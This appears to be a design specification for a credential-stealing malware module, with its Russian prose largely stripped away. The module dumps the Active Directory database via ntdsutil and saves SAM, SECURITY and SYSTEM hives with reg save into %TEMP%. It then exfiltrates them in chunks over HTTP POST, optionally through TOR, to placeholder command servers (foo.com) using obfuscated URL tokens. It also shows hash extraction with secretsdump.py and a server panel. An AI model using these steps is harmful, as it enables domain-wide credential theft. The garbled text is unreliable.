   ACTIVE DIRECTORY     WINDOWS
 




    Active Directory    ,    .


 

    `ntdsutil'   .
    ,          impacket / secretsdump.py
    Active Directory     :
https://devteev.blogspot.com/2014/04/hacking-tricks-easy-way-to-get-ntdsdit.html

      HKLM/SAM, HKLM/Security  HKLM/System.




           modules_HOWTO.
 / - ADll.
  ,      SYSTEM.

*     ,      Active Directory.

*  ,   "AD not found"   .

* ,  ,    Volume Shadow Copy  WinAPI
(   sc query vss),   ,  ()  .

*     .
   4:
ntds.dit
sam.dump
security.dump
system.dump

         :
<prefix>0.dat
<prefix>1.dat
<prefix>2.dat
<prefix>3.dat

      ParentInfo.ParentID (. module_HOWTO)     :
-            
-      
-         
-     -  (      )
-  .

   :
-  64-     (  unsigned)  ParentInfo.ParentID
- 64-     unsigned char filename[8]
-  ,   'a',  'a'
-  ,   'Z',  'Z'
 ,          ,          ,   .

    .

*            %TEMP%
 () ,       .
        -  , ,      ,
    .

*     

ntdsutil "ac in ntds" "ifm" "cr fu %temp%\<prefix>0.dat" q q

  ,        WinAPI
(  ;      ).

*     HKLM/SAM, HKLM/Security  HKLM/System 

reg save hklm\sam %temp%\somepath\<prefix>1.dat
reg save hklm\security %temp%\somepath\<prefix>2.dat
reg save hklm\system %temp%\somepath\<prefix>3.dat

*          (..).
            (,         ).
     () chunksize.     - 10.

       (.).
       ,      TIMEOUT_MIN...TIMEOUT_MAX
(  ).     .
   (  ;  ,   HTTP 200 OK;    ),
     (   ),    ,
   .
  ,      WantRelease     

while(1) Sleep(1000);

 ,      .




      srvad.
     ,   \r\n.
  -   URL,     .
     http  https,    URL .
  ,   http,   -  https.

       TOR.
    TOR  .


  

     :
-     -
-     .

1)         HTTP POST   multipart/form-data (   html-).
POST   :
timestamp -  UNIX-
ip        -  ParentInfo.SelfIP (. module_HOWTO)
ip1       -    
ip2       -    
...
ipN       -  N-  
cid       -  ParentInfo.ParentID (. module_HOWTO)
group     -  ParentInfo.ParentGroup (. module_HOWTO)
hostname  -  ,   GetComputerName()
source    -  `ntds'

   url :
http://foo.com/<junk>/<auth>/<junk>
junk -  ,   URI,   /
auth -  . ,     ,
     .
 -   . 
  :
-  Z    
-   ( !)  6  15-    31. 
   - .       Z.
  - abcde7ol7k9hi8mZ


2)      ,  HTTP POST,   multipart/form-data.
    file.
     Content-Disposition;     URI .
 :
-     .  ,    100,    10 .
-       ,   -    ,   .
   ,      ,     .
    SetEndOfFile().
-  ,          gzip.
-    URL 
http://foo.com/<junk>/<auth>/<cid>/<filename>/<start>/<end>/<eof>

junk -  ,   URI,   /
auth -  .  -   ,   
-  S   
-   ( !)  8  15-    25. 
filename -   ;
start -       ;    ,  .
    ,     .
, 0A --   0 ( 0 ,  A ).
end -       ;   ,    start.
, 3A5A2A3A9A5A9A -  3523959.
eof -   .   ,    ;   ( )
   ,   :
-     0
-   A  F 

    ( )   :
0 - ntds.dit
1 - sam.dump
2 - security.dump
3 - system.dump

  ,  HTTP- 200     ,
  -200     (, 50*  40*  ).
     XML   HTTP-,   <response>.
     4041,   1 -      (    ).

,        9:

HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Oct 2019 13:08:44 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept

<?xml version="1.0" encoding="UTF-8"?>
<response>4049</response>

  -  ,  
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Oct 2019 13:08:44 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept

<?xml version="1.0" encoding="UTF-8"?>
<response>200</response>



      .
    -  .

         :

 | ClientID | Group | IP | Hostname | Total Size

 .

 -      ClientID (.   ).

   :
-  (   )
- ClientID
- Group
- IP
- Hostname
- Total Size (   )

  - .
         - (var $issledovanie - ; var $research - ).

       .

    ;    (   " ?"         ).
         .
     .

      ,   ;    .

      " ".
  ,  ""   (    ).

  Active Directory     :

sudo ./secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local

 ntds.dit  SYSTEM -        
result -   

   :

secretsdump.py -sam sam.dump -security security.dump -system system.dump LOCAL

 ,  :
-  -       ntds.dit, sam.dump, security.dump, system.dump
(     )
-  ,      
-  stdout, stderr        
-   "  ",    ,   .txt  .zip.
      ,     .

 ***

     :

pip
pip install impacket
pip install impacket --upgrade (if needed)

pip install pycrypto (--upgrade if needed)

pip install pyasn1 (if needed)

apt-get install python-dev (if needed)



API 

   API     :

POST /api/v1/hello HTTP/1.1

          .      
(.   ).

POST /api/v1/savef/<cid>/<filename>/<start>/<end>/e

      (.   ).

  200 - .
   200 - .       API.

      ,       (   ).
       .    ,     :

ntds.dit
sam.dump
security.dump
system.dump

    /    -  .

!
      4 (!) .
        (  ).
,    ,         cid.
,        .


 "" 

   "" ,      .
     (/log/1234)         , 
injectDll
pwgrab
importDll


        ,       ( ).
                (..     ).
      .
..         ,     ,     .


